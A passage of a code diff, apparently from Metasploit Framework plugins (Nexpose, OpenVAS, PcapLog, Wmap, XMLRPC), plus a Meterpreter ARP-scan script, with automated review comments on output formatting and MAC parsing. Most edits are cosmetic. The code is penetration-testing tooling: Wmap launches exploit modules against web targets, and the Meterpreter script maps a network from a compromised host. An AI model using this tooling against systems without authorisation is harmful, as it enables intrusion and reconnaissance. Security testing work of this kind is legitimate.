doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef|
title = vulndef.attributes['title']
pciSeverity = vulndef.attributes['pciSeverity']
cvss_score = vulndef.attributes['cvssScore']
cvss_vector = vulndef.attributes['cvssVector']
vulndef.elements['references'].elements.each('reference') do |ref|
if ref.attributes['source'] == 'BID'
refs[ 'BID-' + ref.text ] = true
elsif ref.attributes['source'] == 'CVE'
# ref.text is CVE-$ID
refs[ ref.text ] = true
elsif ref.attributes['source'] == 'MS'
refs[ 'MSB-MS-' + ref.text ] = true
end
end
refs[ 'NEXPOSE-' + vid.downcase ] = true
vuln = framework.db.find_or_create_vuln(
:host => host,
:service => serv,
:name => 'NEXPOSE-' + vid.downcase,
:data => title)
rids = []
refs.keys.each do |r|
rids << framework.db.find_or_create_ref(:name => r)
end
vuln.refs << (rids - vuln.refs)
end
end
rids = []
refs.keys.each do |r|
rids << framework.db.find_or_create_ref(:name => r)
end
vuln.refs << (rids - vuln.refs)
end
end
end
+30 -22
@@ -3,7 +3,10 @@
# This plugin provides integration with OpenVAS. Written by kost and
# averagesecurityguy.
#
# Distributed under MIT license:
# $Id$
# $Revision$
#
# Distributed under MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
@@ -34,7 +37,7 @@ class Plugin::OpenVAS < Msf::Plugin
'openvas_task_pause' => "Pause task by ID",
'openvas_task_resume' => "Resume task by ID",
'openvas_task_resume_or_start' => "Resume task or start task by ID",
'openvas_target_create' => "Create target (name, hosts, comment)",
'openvas_target_delete' => "Delete target by ID",
'openvas_target_list' => "Display list of targets",
@@ -43,7 +46,7 @@ class Plugin::OpenVAS < Msf::Plugin
'openvas_format_list' => "Display list of available report formats",
'openvas_report_list' => "Display a list of available report formats",
'openvas_report_list' => "Display a list of available report formats",
'openvas_report_delete' => "Delete a report specified by ID",
'openvas_report_download' => "Save a report to disk",
'openvas_report_import' => "Import report specified by ID into framework",
@@ -172,7 +175,7 @@ class Plugin::OpenVAS < Msf::Plugin
# Make sure the correct number of arguments are present.
if args?(args, 4, 5)
user, pass, host, port, sslv = args
# SSL warning. User is required to confirm.
@@ -199,10 +202,10 @@ class Plugin::OpenVAS < Msf::Plugin
else
print_status("Usage:")
print_status("openvas_connect username password host port <ssl-confirm>")
print_status("openvas_connect username password host port <ssl-confirm>")
end
end
# Disconnect from an OpenVAS manager
def cmd_openvas_disconnect()
return unless openvas?
@@ -216,7 +219,7 @@ class Plugin::OpenVAS < Msf::Plugin
#--------------------------
def cmd_openvas_target_create(*args)
return unless openvas?
if args?(args, 3)
begin
resp = @ov.target_create(args[0], args[1], args[2])
@@ -255,13 +258,14 @@ class Plugin::OpenVAS < Msf::Plugin
'Columns' => ["ID", "Name", "Hosts", "Max Hosts", "In Use", "Comment"])
id = 0
@ov.target_get_all().each do |target|
tbl << [ id, target["name"], target["hosts"], target["max_hosts"],
target["in_use"], target["comment"] ]
tbl << [ id, target["name"], target["hosts"], target["max_hosts"],
target["in_use"], target["comment"] ]
id += 1
end
print_good("OpenVAS list of targets")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -324,8 +328,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of tasks")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -415,15 +420,16 @@ class Plugin::OpenVAS < Msf::Plugin
begin
tbl = Rex::Ui::Text::Table.new(
'Columns' => [ "ID", "Name" ])
id = 0
@ov.configs.each do |config|
tbl << [ id, config["name"] ]
id += 1
end
print_good("OpenVAS list of configs")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -444,8 +450,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of report formats")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -466,8 +473,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of reports")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -508,7 +516,7 @@ class Plugin::OpenVAS < Msf::Plugin
print_status("Usage: openvas_report_download <report_id> <format_id> <path> <report_name>")
end
end
def cmd_openvas_report_import(*args)
return unless openvas?
@@ -523,7 +531,7 @@ class Plugin::OpenVAS < Msf::Plugin
else
print_status("Usage: openvas_report_import <report_id> <format_id>")
print_status("Only the NBE format is supported for importing.")
end
end
end
end # End OpenVAS class
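Review bot: `print_good tbl.to_s` followed by `print_good "\n"` in the target, task, config, format and report listings (the block after `OpenVAS list of targets` and the four like it) pushes a multi-line table through a helper that prefixes its message with the `[+]` tag, so only the table's first line carries the tag and the blank-line call emits a tagged empty line; `print_line tbl.to_s` and a bare `print_line` keep the output on the driver's stream without the stray prefixes. The same pattern appears in the Wmap section of this commit (`print_status "\n"`, `print_status '='* sizeline`, the `=[ ... testing ]=` banners and `print_status tbl.to_s + "\n"` in view_targets/view_sites), so the fix belongs in both files. Separately, the command table still describes `openvas_report_list` with the same text as `openvas_format_list`; judging by the report listing further down, `'openvas_report_list' => "Display a list of available reports",` is what that entry should say.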
+5 -5
@@ -37,7 +37,7 @@ class Plugin::PcapLog < Msf::Plugin
"pcap_iface" => "Set/Get an interface to capture from",
"pcap_start" => "Start a capture",
"pcap_stop" => "Stop a running capture",
"pcap_show_config" => "Show the current PcapLog configuration"
}
end
@@ -59,7 +59,7 @@ class Plugin::PcapLog < Msf::Plugin
def cmd_pcap_iface(*args)
@iface = args[0] || @iface
print_line "#{self.name} Interface: #{@iface}"
print_line "#{self.name} Interface: #{@iface}"
end
def cmd_pcap_start(*args)
@@ -94,7 +94,7 @@ class Plugin::PcapLog < Msf::Plugin
print_line "Capture Stats: #{@pcap.stats.inspect}"
@pcap = nil
@capture_file.close if @capture_file.respond_to? :close
@capture_thread.kill
@capture_thread.kill
@capture_thread = nil
else
print_error "No capture running."
@@ -124,7 +124,7 @@ class Plugin::PcapLog < Msf::Plugin
return [false, msg]
end
# Check directory suitability.
# Check directory suitability.
unless File.directory? @dir
msg = "Invalid pcap directory specified: '#{@dir}'"
return [false, msg]
@@ -170,7 +170,7 @@ class Plugin::PcapLog < Msf::Plugin
end
end
def initialize(framework, opts)
super
add_console_dispatcher(PcapLogDispatcher)
+165 -165
@@ -12,9 +12,9 @@ module Msf
class Plugin::Wmap < Msf::Plugin
class WmapCommandDispatcher
attr_accessor :targets
include Msf::Ui::Console::CommandDispatcher
def name
@@ -37,12 +37,12 @@ class Plugin::Wmap < Msf::Plugin
while (arg = args.shift)
case arg
when '-c'
self.targets = {}
when '-c'
self.targets = {}
when '-l'
view_targets
return
when '-t'
when '-t'
process_urls(args.shift)
when '-h'
print_status("Usage: wmap_targets [options]")
@@ -50,7 +50,7 @@ class Plugin::Wmap < Msf::Plugin
print_line("\t-t [urls] Define target sites (vhost1,url[space]vhost2,url) ")
print_line("\t-c Clean target sites list")
print_line("\t-l List all target sites")
print_line("")
return
else
@@ -59,7 +59,7 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
def cmd_wmap_sites(*args)
args.push("-h") if args.length == 0
@@ -68,10 +68,10 @@ class Plugin::Wmap < Msf::Plugin
when '-a'
s = add_web_site(args.shift)
if s
print_status("Site created.")
print_status("Site created.")
else
print_error("Unable to create site")
end
end
when '-l'
view_sites
return
@@ -79,7 +79,7 @@ class Plugin::Wmap < Msf::Plugin
u = args.shift
l = args.shift
s = args.shift
if l == nil or l.empty?
l = 200
s = true
@@ -87,16 +87,16 @@ class Plugin::Wmap < Msf::Plugin
l = l.to_i
s = false
end
view_site_tree(u,l,s)
return
return
when '-h'
print_status("Usage: wmap_sites [options]")
print_line("\t-h Display this help text")
print_line("\t-a [url] Add site (vhost,url)")
print_line("\t-l List all available sites")
print_line("\t-s [urls] (level) Display site structure (vhost,url)")
print_line("")
return
else
@@ -105,7 +105,7 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
def cmd_wmap_run(*args)
# Run exploit check
wmap_check = true
@@ -113,7 +113,7 @@ class Plugin::Wmap < Msf::Plugin
wmap_runexpl = false
# Exit wmap if session is created
wmap_exitifsess = true
# Formating
sizeline = 60
@@ -122,38 +122,38 @@ class Plugin::Wmap < Msf::Plugin
# Exclude files can be modified by setting datastore['WMAP_EXCLUDE']
wmap_exclude_files = '.*\.(gif|jpg|png*)$'
run_wmap_ssl = true
run_wmap_server = true
run_wmap_dir_file = true
run_wmap_query = true
run_wmap_unique_query = true
run_wmap_generic = true
# If module supports datastore['VERBOSE']
moduleverbose = false
showprogress = false
if not run_wmap_ssl
print_status("Loading of wmap ssl modules disabled.")
end
if not run_wmap_server
print_status("Loading of wmap server modules disabled.")
end
if not run_wmap_dir_file
end
if not run_wmap_dir_file
print_status("Loading of wmap dir and file modules disabled.")
end
if not run_wmap_query
print_status("Loading of wmap query modules disabled.")
end
if not run_wmap_unique_query
end
if not run_wmap_unique_query
print_status("Loading of wmap unique query modules disabled.")
end
if not run_wmap_generic
end
if not run_wmap_generic
print_status("Loading of wmap generic modules disabled.")
end
end
stamp = Time.now.to_f
mode = 0
@@ -203,7 +203,7 @@ class Plugin::Wmap < Msf::Plugin
print_status("Using module #{mname}.")
end
using_m = true
when '-h'
print_status("Usage: wmap_run [options]")
print_line("\t-h Display this help text")
@@ -220,30 +220,30 @@ class Plugin::Wmap < Msf::Plugin
print_error("Targets have not been selected.")
return
end
if self.targets.keys.length == 0
if self.targets.keys.length == 0
print_error("Targets have not been selected.")
return
end
self.targets.each_with_index do |t, idx|
selected_host = t[1][:host]
selected_port = t[1][:port]
selected_ssl = t[1][:ssl]
selected_vhost = t[1][:vhost]
print_status ("Testing target:")
print_status ("\tSite: #{selected_vhost} (#{selected_host})")
print_status ("\tPort: #{selected_port} SSL: #{selected_ssl}")
puts '='* sizeline
print_status '='* sizeline
print_status("Testing started. #{(Time.now )}")
if not selected_ssl
run_wmap_ssl = false
#print_status ("Target is not SSL. SSL modules disabled.")
end
# WMAP_DIR, WMAP_FILE
matches = {}
@@ -252,7 +252,7 @@ class Plugin::Wmap < Msf::Plugin
# WMAP_QUERY
matches2 = {}
# WMAP_SSL
matches3 = {}
@@ -279,7 +279,7 @@ class Plugin::Wmap < Msf::Plugin
if penabled
#if ( not using_p or eprofile.include? n.split('/').last ) or (using_m and n.match(mname))
if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p)
if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p)
#
# First run the WMAP_SERVER plugins
#
@@ -307,7 +307,7 @@ class Plugin::Wmap < Msf::Plugin
when :WMAP_SSL
if run_wmap_ssl
matches3[[selected_host,selected_port,selected_ssl,selected_vhost,mtype[1]+'/'+n]]=true
end
end
else
# Black Hole
end
@@ -321,14 +321,14 @@ class Plugin::Wmap < Msf::Plugin
# Handle modules that need to be run before all tests IF SERVER is SSL, once usually again the SSL web server.
# :WMAP_SSL
#
puts "\n=[ SSL testing ]="
puts "=" * sizeline
print_status "\n=[ SSL testing ]="
print_status "=" * sizeline
if not selected_ssl
print_status ("Target is not SSL. SSL modules disabled.")
end
idx = 0
matches3.each_key do |xref|
idx += 1
@@ -377,7 +377,7 @@ class Plugin::Wmap < Msf::Plugin
mod.datastore['VHOST'] = xref[3].to_s
mod.datastore['VERBOSE'] = moduleverbose
mod.datastore['ShowProgress'] = showprogress
#
# Run the plugins that only need to be
# launched once.
@@ -386,7 +386,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_SSL
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -490,14 +490,14 @@ class Plugin::Wmap < Msf::Plugin
end
end
#
# Handle modules that need to be run before all tests, once usually again the web server.
# :WMAP_SERVER
#
puts "\n=[ Web Server testing ]="
puts "=" * sizeline
print_status "\n=[ Web Server testing ]="
print_status "=" * sizeline
idx = 0
matches1.each_key do |xref|
idx += 1
@@ -555,7 +555,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_SERVER
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -663,9 +663,9 @@ class Plugin::Wmap < Msf::Plugin
# Handle modules to be run at every path/file
# WMAP_DIR, WMAP_FILE
#
puts "\n=[ File/Dir testing ]="
puts "=" * sizeline
print_status "\n=[ File/Dir testing ]="
print_status "=" * sizeline
idx = 0
matches.each_key do |xref|
idx += 1
@@ -716,13 +716,13 @@ class Plugin::Wmap < Msf::Plugin
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
puts "Module #{xref[4]}:"
print_status "Module #{xref[4]}:"
test_tree = load_tree(w)
test_tree.each do |node|
p = node.current_path
p = node.current_path
testpath = Pathname.new(p)
strpath = testpath.cleanpath(false).to_s
@@ -830,9 +830,9 @@ class Plugin::Wmap < Msf::Plugin
# Run modules for each request to play with URI with UNIQUE query parameters.
# WMAP_UNIQUE_QUERY
#
puts "\n=[ Unique Query testing ]="
puts "=" * sizeline
print_status "\n=[ Unique Query testing ]="
print_status "=" * sizeline
idx = 0
matches5.each_key do |xref|
idx += 1
@@ -881,50 +881,50 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
utest_query = {}
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
w.web_forms.each do |form|
#
# Only test unique query strings by comparing signature to previous tested signatures 'path,p1,p2,pn'
#
datastr = ""
typestr = ""
typestr = ""
temparr = []
#puts "---------"
#puts form.params
#puts "+++++++++"
#print_status "---------"
#print_status form.params
#print_status "+++++++++"
form.params.each do |p|
pn, pv, pt = p
temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s)
end
datastr = temparr.join("&") if (temparr and not temparr.empty?)
datastr = temparr.join("&") if (temparr and not temparr.empty?)
if (utest_query.has_key?(mod.signature(form.path,datastr)) == false)
mod.datastore['METHOD'] = form.method.upcase
mod.datastore['PATH'] = form.path
mod.datastore['QUERY'] = form.query
if form.method.upcase == 'GET'
mod.datastore['QUERY'] = datastr
mod.datastore['DATA'] = ""
end
mod.datastore['DATA'] = ""
end
mod.datastore['DATA'] = datastr if form.method.upcase == 'POST'
mod.datastore['TYPES'] = typestr
#
# TODO: Add headers, etc.
#
if wtype == :WMAP_UNIQUE_QUERY
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -953,7 +953,7 @@ class Plugin::Wmap < Msf::Plugin
# Unique query tested, actually the value does not matter
#
#print_status("sig: #{mod.signature(form.path,varnarr.join(','))}")
utest_query[mod.signature(form.path,datastr)]=1
else
#print_status("Already tested")
@@ -972,9 +972,9 @@ class Plugin::Wmap < Msf::Plugin
# and will make this shotgun implementation much simple.
# WMAP_QUERY
#
puts "\n=[ Query testing ]="
puts "=" * sizeline
print_status "\n=[ Query testing ]="
print_status "=" * sizeline
idx = 0
matches2.each_key do |xref|
idx += 1
@@ -1026,37 +1026,37 @@ class Plugin::Wmap < Msf::Plugin
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
w.web_forms.each do |req|
datastr = ""
typestr = ""
typestr = ""
temparr = []
req.params.each do |p|
pn, pv, pt = p
temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s)
end
datastr = temparr.join("&") if (temparr and not temparr.empty?)
datastr = temparr.join("&") if (temparr and not temparr.empty?)
mod.datastore['METHOD'] = req.method.upcase
mod.datastore['PATH'] = req.path
if req.method.upcase == 'GET'
mod.datastore['QUERY'] = datastr
mod.datastore['DATA'] = ""
end
mod.datastore['DATA'] = ""
end
mod.datastore['DATA'] = datastr if req.method.upcase == 'POST'
mod.datastore['TYPES'] = typestr
#
# TODO: Add method, headers, etc.
#
if wtype == :WMAP_QUERY
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -1087,16 +1087,16 @@ class Plugin::Wmap < Msf::Plugin
print_status(" >> Exception from #{xref[4]}: #{$!}")
end
end
#
# Handle modules that need to be after all tests, once.
# Good place to have modules that analize the test results and/or
# launch exploits.
# :WMAP_GENERIC
#
puts "\n=[ General testing ]="
puts "=" * sizeline
print_status "\n=[ General testing ]="
print_status "=" * sizeline
idx = 0
matches10.each_key do |xref|
idx += 1
@@ -1146,7 +1146,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_GENERIC
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -1159,7 +1159,7 @@ class Plugin::Wmap < Msf::Plugin
print_status(" >> Exception during check launch from #{xref[4]}: #{$!}")
end
else
begin
session = mod.run_simple(
'LocalInput' => driver.input,
@@ -1180,22 +1180,22 @@ class Plugin::Wmap < Msf::Plugin
if (mode & wmap_show != 0)
print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds.")
print_status("Done.")
puts "+" * sizeline
puts "\n"
print_status "+" * sizeline
print_status "\n"
end
end
# EOM
end
end
def view_targets
if self.targets == nil or self.targets.keys.length == 0
print_status "No targets have been defined"
return
end
indent = ' '
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => 'Defined targets',
@@ -1213,12 +1213,12 @@ class Plugin::Wmap < Msf::Plugin
tbl << [ idx.to_s, t[1][:vhost], t[1][:host], t[1][:port], t[1][:ssl], t[1][:path].to_s ]
}
puts tbl.to_s + "\n"
print_status tbl.to_s + "\n"
end
def view_sites
indent = ' '
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => 'Available sites',
@@ -1232,11 +1232,11 @@ class Plugin::Wmap < Msf::Plugin
'# Forms',
])
idx = 0
idx = 0
self.framework.db.hosts.each do |bdhost|
bdhost.services.each do |serv|
serv.web_sites.each do |web|
c = web.web_pages.count
c = web.web_pages.count
f = web.web_forms.count
tbl << [ idx.to_s, bdhost.address, web.vhost, serv.port, c.to_s, f.to_s ]
idx += 1
@@ -1244,23 +1244,23 @@ class Plugin::Wmap < Msf::Plugin
end
end
puts tbl.to_s + "\n"
print_status tbl.to_s + "\n"
end
# Reusing code from hdmoore
#
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
def add_web_site(url)
vhost = nil
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
@@ -1281,24 +1281,24 @@ class Plugin::Wmap < Msf::Plugin
uri = URI.parse(url) rescue nil
if not uri
print_error("Could not understand URL: #{url}")
return
return
end
if uri.scheme !~ /^https?/
print_error("Only http and https URLs are accepted: #{url}")
return
end
ssl = false
if uri.scheme == 'https'
ssl = true
end
site = self.framework.db.report_web_site(:wait => true, :host => uri.host, :port => uri.port, :vhost => vhost, :ssl => ssl)
return site
end
# Code by hdm. Modified two lines by et
#
def process_urls(urlstr)
@@ -1309,7 +1309,7 @@ class Plugin::Wmap < Msf::Plugin
urls.each do |url|
next if url.to_s.strip.empty?
vhost = nil
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
@@ -1345,10 +1345,10 @@ class Plugin::Wmap < Msf::Plugin
return if target_whitelist.length == 0
self.targets = {}
target_whitelist.each do |ent|
vhost,target = ent
host = self.framework.db.workspace.hosts.find_by_address(target.host)
if not host
print_error("No matching host for #{target.host}")
@@ -1359,16 +1359,16 @@ class Plugin::Wmap < Msf::Plugin
print_error("No matching service for #{target.host}:#{target.port}")
next
end
#puts "aaa"
#puts framework.db.workspace.name
#print_status "aaa"
#print_status framework.db.workspace.name
#sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address])
sites = serv.web_sites.find(:all)
sites.each do |site|
#site.web_forms.find_all_by_path(target.path).each do |form|
ckey = [ site.vhost, host.address, serv.port, target.path].join("|")
if not self.targets[ckey]
@@ -1389,23 +1389,23 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
def view_site_tree(urlstr, md, ld)
site_whitelist = []
urls = urlstr.to_s.split(/\s+/)
urls.each do |url|
next if url.to_s.strip.empty?
vhost = nil
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
if url !~ /^http/
vhost,url = url.split(",", 2)
if url.to_s.empty?
url = vhost
vhost = nil
@@ -1435,10 +1435,10 @@ class Plugin::Wmap < Msf::Plugin
return if site_whitelist.length == 0
vsites = {}
site_whitelist.each do |ent|
vhost,target = ent
host = self.framework.db.workspace.hosts.find_by_address(target.host)
if not host
print_error("No matching host for #{target.host}")
@@ -1449,14 +1449,14 @@ class Plugin::Wmap < Msf::Plugin
print_error("No matching service for #{target.host}:#{target.port}")
next
end
#puts "aaa"
#puts framework.db.workspace.name
#print_status "aaa"
#print_status framework.db.workspace.name
sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address])
#sites = serv.web_sites.find(:all)
sites.each do |site|
#site.vhost
#site.web_forms.find_all_by_path(target.path).each do |form|
@@ -1466,18 +1466,18 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
#
# Load website structure into a tree
#
def load_tree(s)
pathchr = '/'
wtree = Tree.new(s.vhost)
# Load site pages
# Load site pages
s.web_pages.find(:all, :order => 'path').each do |req|
tarray = req.path.to_s.split(pathchr)
tarray.delete("")
@@ -1487,7 +1487,7 @@ class Plugin::Wmap < Msf::Plugin
tpath = tpath + Pathname.new(df.to_s)
end
end
# Load site forms
s.web_forms.each do |req|
tarray = req.path.to_s.split(pathchr)
@@ -1498,42 +1498,42 @@ class Plugin::Wmap < Msf::Plugin
tpath = tpath + Pathname.new(df.to_s)
end
end
return wtree
end
#
# Print Tree structure. Still ugly
#
def print_tree(tree, maxlevel, limitlevel)
initab = " " * 4
indent = 6
if tree != nil and tree.depth <= maxlevel
print initab + (" " * indent * tree.depth)
if tree.depth > 0
print "|"+("-" * (indent-1))+"/"
print "|"+("-" * (indent-1))+"/"
end
if tree.depth >= 0
if tree.depth >= 0
if tree.depth == 0
print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n"
print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n"
else
c = tree.children.count
if c > 0
print tree.name + " (" + c.to_s+")\n"
else
print tree.name + "\n"
end
end
end
end
tree.children.each_pair do |name,child|
print_tree(child,maxlevel,limitlevel)
end
end
end
#def print_tree(tree)
# if tree.is_leaf? and tree.depth > 0
@@ -1545,7 +1545,7 @@ class Plugin::Wmap < Msf::Plugin
# print_tree(child)
# end
#end
end
class WebTarget < ::Hash
@@ -1554,10 +1554,10 @@ class Plugin::Wmap < Msf::Plugin
"#{proto}://#{self[:host]}:#{self[:port]}#{self[:path]}"
end
end
def initialize(framework, opts)
super
wmapversion = '1.0'
wmapbanner = "[WMAP #{wmapversion}] === et [ ] metasploit.com 2011"
+1 -1
@@ -138,7 +138,7 @@ class Plugin::XMLRPC < Msf::Plugin
self.server.add_handler(::XMLRPC::iPIMethods("plugin"),
::Msf::RPC::Plugin.new(*args)
)
# Set the default/catch-all handler
self.server.set_default_handler do |name, *args|
raise ::XMLRPC::FaultException.new(-99, "Method #{name} missing or wrong number of parameters!")
+8 -14
@@ -25,6 +25,7 @@ def enum_int
end
end
def arp_scan(cidr)
print_status("ARP Scanning #{cidr}")
ws = client.railgun.ws2_32
@@ -42,27 +43,20 @@ def arp_scan(cidr)
end
iplst.each do |ip_text|
if i < 10
a.push(::Thread.new {
a.push(::Thread.new {
h = ws.inet_addr(ip_text)
ip = h["return"]
h = iphlp.SendARP(ip,0,6,6)
if h["return"] == client.railgun.const("NO_ERROR")
mac = h["pMacAddr"]
print_status("IP: #{ip_text} MAC " +
mac[0].ord.to_s(16) + ":" +
mac[1].ord.to_s(16) + ":" +
mac[2].ord.to_s(16) + ":" +
mac[3].ord.to_s(16) + ":" +
mac[4].ord.to_s(16) + ":" +
mac[5].ord.to_s(16)
)
mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':')
print_status("IP: #{ip_text} MAC #{mac_text}")
found << "#{ip_text}\n"
end
})
i += 1
i += 1
else
sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
i = 0
sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
i = 0
end
end
a.delete_if {|x| not x.alive?} while not a.empty?
@@ -118,4 +112,4 @@ if client.platform =~ /win32|win64/
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
end
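Review bot: The rewritten MAC formatting in the second hunk of arp_scan formats every byte of `h["pMacAddr"]`, whereas the removed lines printed exactly six; if railgun hands back a buffer longer than the six bytes requested in the `SendARP(ip,0,6,6)` call, the printed address grows with it. Unpacking a fixed count keeps the old bound while retaining the new zero-padding: `mac_text = h["pMacAddr"].unpack('C6').map { |e| "%02x" % e }.join(':')`. The same hunk keeps `sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?`, which relies on `sleep`'s Integer return value being truthy and on the low precedence of `and`; an `until a.empty?` loop with the two statements on separate lines would say the same thing more plainly. arp_scan's body begins and ends outside this hunk.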
